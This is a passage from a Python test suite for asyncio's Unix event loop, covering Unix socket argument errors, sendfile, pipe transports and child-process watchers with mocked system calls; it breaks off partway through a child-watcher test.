with test_utils.unix_socket_path() as path:
path = pathlib.Path(path)
coro = self.loop.create_unix_connection(lambda: None, path)
with self.assertRaises(FileNotFoundError):
# If pathlib.Path wasn't supported, the exception would be
# different.
self.loop.run_until_complete(coro)
def test_create_unix_server_existing_path_nonsock(self):
with tempfile.NamedTemporaryFile() as file:
coro = self.loop.create_unix_server(lambda: None, file.name)
with self.assertRaisesRegex(OSError,
'Address.*is already in use'):
self.loop.run_until_complete(coro)
def test_create_unix_server_ssl_bool(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl=True)
with self.assertRaisesRegex(TypeError,
'ssl argument must be an SSLContext'):
self.loop.run_until_complete(coro)
def test_create_unix_server_nopath_nosock(self):
coro = self.loop.create_unix_server(lambda: None, path=None)
with self.assertRaisesRegex(ValueError,
'path was not specified, and no sock'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_dgram(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
@support.skip_unless_bind_unix_socket
def test_create_unix_server_path_stream_bittype(self):
sock = socket.socket(
socket.AF_UNIX, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with tempfile.NamedTemporaryFile() as file:
fn = file.name
try:
with sock:
sock.bind(fn)
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
finally:
os.unlink(fn)
def test_create_unix_server_ssl_timeout_with_plain_sock(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_connection(lambda: None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.unix_events.socket')
def test_create_unix_server_bind_error(self, m_socket):
# Ensure that the socket is closed on any bind error
sock = mock.Mock()
m_socket.socket.return_value = sock
sock.bind.side_effect = OSError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
sock.bind.side_effect = MemoryError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(MemoryError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_unix_connection_path_sock(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, sock=object())
with self.assertRaisesRegex(ValueError, 'path and sock can not be'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nopath_nosock(self):
coro = self.loop.create_unix_connection(
lambda: None, None)
with self.assertRaisesRegex(ValueError,
'no path and sock were specified'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nossl_serverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, server_hostname='spam')
with self.assertRaisesRegex(ValueError,
'server_hostname is only meaningful'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_noserverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, ssl=True)
with self.assertRaisesRegex(
ValueError, 'you have to pass server_hostname when using ssl'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_timeout_with_plain_sock(self):
coro = self.loop.create_unix_connection(lambda: None, path='spam',
ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(os, 'sendfile'),
'sendfile is not supported')
class SelectorEventLoopUnixSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
self._ready = loop.create_future()
def connection_made(self, transport):
self.started = True
self.transport = transport
self._ready.set_result(None)
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, cleanup=True):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(False)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
if cleanup:
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
port = support.find_unused_port()
srv_sock = self.make_socket(cleanup=False)
srv_sock.bind((support.HOST, port))
server = self.run_loop(self.loop.create_server(
lambda: proto, sock=srv_sock))
self.run_loop(self.loop.sock_connect(sock, (support.HOST, port)))
self.run_loop(proto._ready)
def cleanup():
proto.transport.close()
self.run_loop(proto.wait_closed())
server.close()
self.run_loop(server.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test_sock_sendfile_not_available(self):
sock, proto = self.prepare()
with mock.patch('asyncio.unix_events.os', spec=[]):
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"os[.]sendfile[(][)] is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_not_a_file(self):
sock, proto = self.prepare()
f = object()
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_iobuffer(self):
sock, proto = self.prepare()
f = io.BytesIO()
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_not_regular_file(self):
sock, proto = self.prepare()
f = mock.Mock()
f.fileno.return_value = -1
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_cancel1(self):
sock, proto = self.prepare()
fut = self.loop.create_future()
fileno = self.file.fileno()
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
fut.cancel()
with contextlib.suppress(asyncio.CancelledError):
self.run_loop(fut)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
def test_sock_sendfile_cancel2(self):
sock, proto = self.prepare()
fut = self.loop.create_future()
fileno = self.file.fileno()
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
fut.cancel()
self.loop._sock_sendfile_native_impl(fut, sock.fileno(), sock, fileno,
0, None, len(self.DATA), 0)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
def test_sock_sendfile_blocking_error(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = mock.Mock()
fut.cancelled.return_value = False
with mock.patch('os.sendfile', side_effect=BlockingIOError()):
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
key = self.loop._selector.get_key(sock)
self.assertIsNotNone(key)
fut.add_done_callback.assert_called_once_with(mock.ANY)
def test_sock_sendfile_os_error_first_call(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
with mock.patch('os.sendfile', side_effect=OSError()):
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIsInstance(exc, events.SendfileNotAvailableError)
self.assertEqual(0, self.file.tell())
def test_sock_sendfile_os_error_next_call(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
err = OSError()
with mock.patch('os.sendfile', side_effect=err):
self.loop._sock_sendfile_native_impl(fut, sock.fileno(),
sock, fileno,
1000, None, len(self.DATA),
1000)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIs(exc, err)
self.assertEqual(1000, self.file.tell())
def test_sock_sendfile_exception(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
err = events.SendfileNotAvailableError()
with mock.patch('os.sendfile', side_effect=err):
self.loop._sock_sendfile_native_impl(fut, sock.fileno(),
sock, fileno,
1000, None, len(self.DATA),
1000)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIs(exc, err)
self.assertEqual(1000, self.file.tell())
class UnixReadPipeTransportTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.protocol = test_utils.make_test_protocol(asyncio.Protocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
blocking_patcher = mock.patch('os.set_blocking')
blocking_patcher.start()
self.addCleanup(blocking_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFIFO
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def read_pipe_transport(self, waiter=None):
transport = unix_events._UnixReadPipeTransport(self.loop, self.pipe,
self.protocol,
waiter=waiter)
self.addCleanup(close_pipe_transport, transport)
return transport
def test_ctor(self):
waiter = asyncio.Future(loop=self.loop)
tr = self.read_pipe_transport(waiter=waiter)
self.loop.run_until_complete(waiter)
self.protocol.connection_made.assert_called_with(tr)
self.loop.assert_reader(5, tr._read_ready)
self.assertIsNone(waiter.result())
@mock.patch('os.read')
def test__read_ready(self, m_read):
tr = self.read_pipe_transport()
m_read.return_value = b'data'
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.protocol.data_received.assert_called_with(b'data')
@mock.patch('os.read')
def test__read_ready_eof(self, m_read):
tr = self.read_pipe_transport()
m_read.return_value = b''
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.eof_received.assert_called_with()
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.read')
def test__read_ready_blocked(self, m_read):
tr = self.read_pipe_transport()
m_read.side_effect = BlockingIOError
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
test_utils.run_briefly(self.loop)
self.assertFalse(self.protocol.data_received.called)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.read')
def test__read_ready_error(self, m_read, m_logexc):
tr = self.read_pipe_transport()
err = OSError()
m_read.side_effect = err
tr._close = mock.Mock()
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
tr._close.assert_called_with(err)
m_logexc.assert_called_with(
test_utils.MockPattern(
'Fatal read error on pipe transport'
'\nprotocol:.*\ntransport:.*'),
exc_info=(OSError, MOCK_ANY, MOCK_ANY))
@mock.patch('os.read')
def test_pause_reading(self, m_read):
tr = self.read_pipe_transport()
m = mock.Mock()
self.loop.add_reader(5, m)
tr.pause_reading()
self.assertFalse(self.loop.readers)
@mock.patch('os.read')
def test_resume_reading(self, m_read):
tr = self.read_pipe_transport()
tr.pause_reading()
tr.resume_reading()
self.loop.assert_reader(5, tr._read_ready)
@mock.patch('os.read')
def test_close(self, m_read):
tr = self.read_pipe_transport()
tr._close = mock.Mock()
tr.close()
tr._close.assert_called_with(None)
@mock.patch('os.read')
def test_close_already_closing(self, m_read):
tr = self.read_pipe_transport()
tr._closing = True
tr._close = mock.Mock()
tr.close()
self.assertFalse(tr._close.called)
@mock.patch('os.read')
def test__close(self, m_read):
tr = self.read_pipe_transport()
err = object()
tr._close(err)
self.assertTrue(tr.is_closing())
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
def test__call_connection_lost(self):
tr = self.read_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test__call_connection_lost_with_err(self):
tr = self.read_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test_pause_reading_on_closed_pipe(self):
tr = self.read_pipe_transport()
tr.close()
test_utils.run_briefly(self.loop)
self.assertIsNone(tr._loop)
tr.pause_reading()
def test_pause_reading_on_paused_pipe(self):
tr = self.read_pipe_transport()
tr.pause_reading()
# the second call should do nothing
tr.pause_reading()
def test_resume_reading_on_closed_pipe(self):
tr = self.read_pipe_transport()
tr.close()
test_utils.run_briefly(self.loop)
self.assertIsNone(tr._loop)
tr.resume_reading()
def test_resume_reading_on_paused_pipe(self):
tr = self.read_pipe_transport()
# the pipe is not paused
# resuming should do nothing
tr.resume_reading()
class UnixWritePipeTransportTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.protocol = test_utils.make_test_protocol(asyncio.BaseProtocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
blocking_patcher = mock.patch('os.set_blocking')
blocking_patcher.start()
self.addCleanup(blocking_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFSOCK
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def write_pipe_transport(self, waiter=None):
transport = unix_events._UnixWritePipeTransport(self.loop, self.pipe,
self.protocol,
waiter=waiter)
self.addCleanup(close_pipe_transport, transport)
return transport
def test_ctor(self):
waiter = asyncio.Future(loop=self.loop)
tr = self.write_pipe_transport(waiter=waiter)
self.loop.run_until_complete(waiter)
self.protocol.connection_made.assert_called_with(tr)
self.loop.assert_reader(5, tr._read_ready)
self.assertEqual(None, waiter.result())
def test_can_write_eof(self):
tr = self.write_pipe_transport()
self.assertTrue(tr.can_write_eof())
@mock.patch('os.write')
def test_write(self, m_write):
tr = self.write_pipe_transport()
m_write.return_value = 4
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
@mock.patch('os.write')
def test_write_no_data(self, m_write):
tr = self.write_pipe_transport()
tr.write(b'')
self.assertFalse(m_write.called)
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(b''), tr._buffer)
@mock.patch('os.write')
def test_write_partial(self, m_write):
tr = self.write_pipe_transport()
m_write.return_value = 2
tr.write(b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'ta'), tr._buffer)
@mock.patch('os.write')
def test_write_buffer(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'previous')
tr.write(b'data')
self.assertFalse(m_write.called)
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'previousdata'), tr._buffer)
@mock.patch('os.write')
def test_write_again(self, m_write):
tr = self.write_pipe_transport()
m_write.side_effect = BlockingIOError()
tr.write(b'data')
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('asyncio.unix_events.logger')
@mock.patch('os.write')
def test_write_err(self, m_write, m_log):
tr = self.write_pipe_transport()
err = OSError()
m_write.side_effect = err
tr._fatal_error = mock.Mock()
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
tr._fatal_error.assert_called_with(
err,
'Fatal write error on pipe transport')
self.assertEqual(1, tr._conn_lost)
tr.write(b'data')
self.assertEqual(2, tr._conn_lost)
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
# This is a bit overspecified. :-(
m_log.warning.assert_called_with(
'pipe closed by peer or os.write(pipe, data) raised exception.')
tr.close()
@mock.patch('os.write')
def test_write_close(self, m_write):
tr = self.write_pipe_transport()
tr._read_ready() # pipe was closed by peer
tr.write(b'data')
self.assertEqual(tr._conn_lost, 1)
tr.write(b'data')
self.assertEqual(tr._conn_lost, 2)
def test__read_ready(self):
tr = self.write_pipe_transport()
tr._read_ready()
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertTrue(tr.is_closing())
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.write')
def test__write_ready(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 4
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
@mock.patch('os.write')
def test__write_ready_partial(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 3
tr._write_ready()
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'a'), tr._buffer)
@mock.patch('os.write')
def test__write_ready_again(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.side_effect = BlockingIOError()
tr._write_ready()
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('os.write')
def test__write_ready_empty(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 0
tr._write_ready()
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.write')
def test__write_ready_err(self, m_write, m_logexc):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.side_effect = err = OSError()
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual(bytearray(), tr._buffer)
self.assertTrue(tr.is_closing())
m_logexc.assert_not_called()
self.assertEqual(1, tr._conn_lost)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
@mock.patch('os.write')
def test__write_ready_closing(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._closing = True
tr._buffer = bytearray(b'data')
m_write.return_value = 4
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual(bytearray(), tr._buffer)
self.protocol.connection_lost.assert_called_with(None)
self.pipe.close.assert_called_with()
@mock.patch('os.write')
def test_abort(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
self.loop.add_reader(5, tr._read_ready)
tr._buffer = [b'da', b'ta']
tr.abort()
self.assertFalse(m_write.called)
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
self.assertTrue(tr.is_closing())
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test__call_connection_lost(self):
tr = self.write_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test__call_connection_lost_with_err(self):
tr = self.write_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test_close(self):
tr = self.write_pipe_transport()
tr.write_eof = mock.Mock()
tr.close()
tr.write_eof.assert_called_with()
# closing the transport twice must not fail
tr.close()
def test_close_closing(self):
tr = self.write_pipe_transport()
tr.write_eof = mock.Mock()
tr._closing = True
tr.close()
self.assertFalse(tr.write_eof.called)
def test_write_eof(self):
tr = self.write_pipe_transport()
tr.write_eof()
self.assertTrue(tr.is_closing())
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test_write_eof_pending(self):
tr = self.write_pipe_transport()
tr._buffer = [b'data']
tr.write_eof()
self.assertTrue(tr.is_closing())
self.assertFalse(self.protocol.connection_lost.called)
class AbstractChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = asyncio.AbstractChildWatcher()
self.assertRaises(
NotImplementedError, watcher.add_child_handler, f, f)
self.assertRaises(
NotImplementedError, watcher.remove_child_handler, f)
self.assertRaises(
NotImplementedError, watcher.attach_loop, f)
self.assertRaises(
NotImplementedError, watcher.close)
self.assertRaises(
NotImplementedError, watcher.__enter__)
self.assertRaises(
NotImplementedError, watcher.__exit__, f, f, f)
class BaseChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = unix_events.BaseChildWatcher()
self.assertRaises(
NotImplementedError, watcher._do_waitpid, f)
WaitPidMocks = collections.namedtuple("WaitPidMocks",
("waitpid",
"WIFEXITED",
"WIFSIGNALED",
"WEXITSTATUS",
"WTERMSIG",
))
class ChildWatcherTestsMixin:
ignore_warnings = mock.patch.object(log.logger, "warning")
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.running = False
self.zombies = {}
with mock.patch.object(
self.loop, "add_signal_handler") as self.m_add_signal_handler:
self.watcher = self.create_watcher()
self.watcher.attach_loop(self.loop)
def waitpid(self, pid, flags):
if isinstance(self.watcher, asyncio.SafeChildWatcher) or pid != -1:
self.assertGreater(pid, 0)
try:
if pid < 0:
return self.zombies.popitem()
else:
return pid, self.zombies.pop(pid)
except KeyError:
pass
if self.running:
return 0, 0
else:
raise ChildProcessError()
def add_zombie(self, pid, returncode):
self.zombies[pid] = returncode + 32768
def WIFEXITED(self, status):
return status >= 32768
def WIFSIGNALED(self, status):
return 32700 < status < 32768
def WEXITSTATUS(self, status):
self.assertTrue(self.WIFEXITED(status))
return status - 32768
def WTERMSIG(self, status):
self.assertTrue(self.WIFSIGNALED(status))
return 32768 - status
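    # Note on the fake status encoding used by this mixin: add_zombie() stores
    # an exit status as returncode + 32768, so WIFEXITED() treats any status
    # >= 32768 as a normal exit and WEXITSTATUS() recovers the code as
    # status - 32768. A child killed by signal N is registered with returncode
    # -N, which lands just below 32768, so WIFSIGNALED() matches
    # 32700 < status < 32768 and WTERMSIG() recovers the signal number as
    # 32768 - status.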
def test_create_watcher(self):
self.m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
def waitpid_mocks(func):
def wrapped_func(self):
def patch(target, wrapper):
return mock.patch(target, wraps=wrapper,
new_callable=mock.Mock)
with patch('os.WTERMSIG', self.WTERMSIG) as m_WTERMSIG, \
patch('os.WEXITSTATUS', self.WEXITSTATUS) as m_WEXITSTATUS, \
patch('os.WIFSIGNALED', self.WIFSIGNALED) as m_WIFSIGNALED, \
patch('os.WIFEXITED', self.WIFEXITED) as m_WIFEXITED, \
patch('os.waitpid', self.waitpid) as m_waitpid:
func(self, WaitPidMocks(m_waitpid,
m_WIFEXITED, m_WIFSIGNALED,
m_WEXITSTATUS, m_WTERMSIG,
))
return wrapped_func
@waitpid_mocks
def test_sigchld(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(42, callback, 9, 10, 14)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child is running
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (returncode 12)
self.running = False
self.add_zombie(42, 12)
self.watcher._sig_chld()
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.assert_called_once_with(42, 12, 9, 10, 14)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(42, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(43, callback1, 7, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(44, callback2, 147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (signal 3)
self.add_zombie(43, -3)
self.watcher._sig_chld()
callback1.assert_called_once_with(43, -3, 7, 8)
self.assertFalse(callback2.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback1.reset_mock()
# child 2 still running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 2 terminates (code 108)
self.add_zombie(44, 108)
self.running = False
self.watcher._sig_chld()
callback2.assert_called_once_with(44, 108, 147, 18)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(43, 14)
self.add_zombie(44, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children_terminating_together(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(45, callback1, 17, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(46, callback2, 1147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
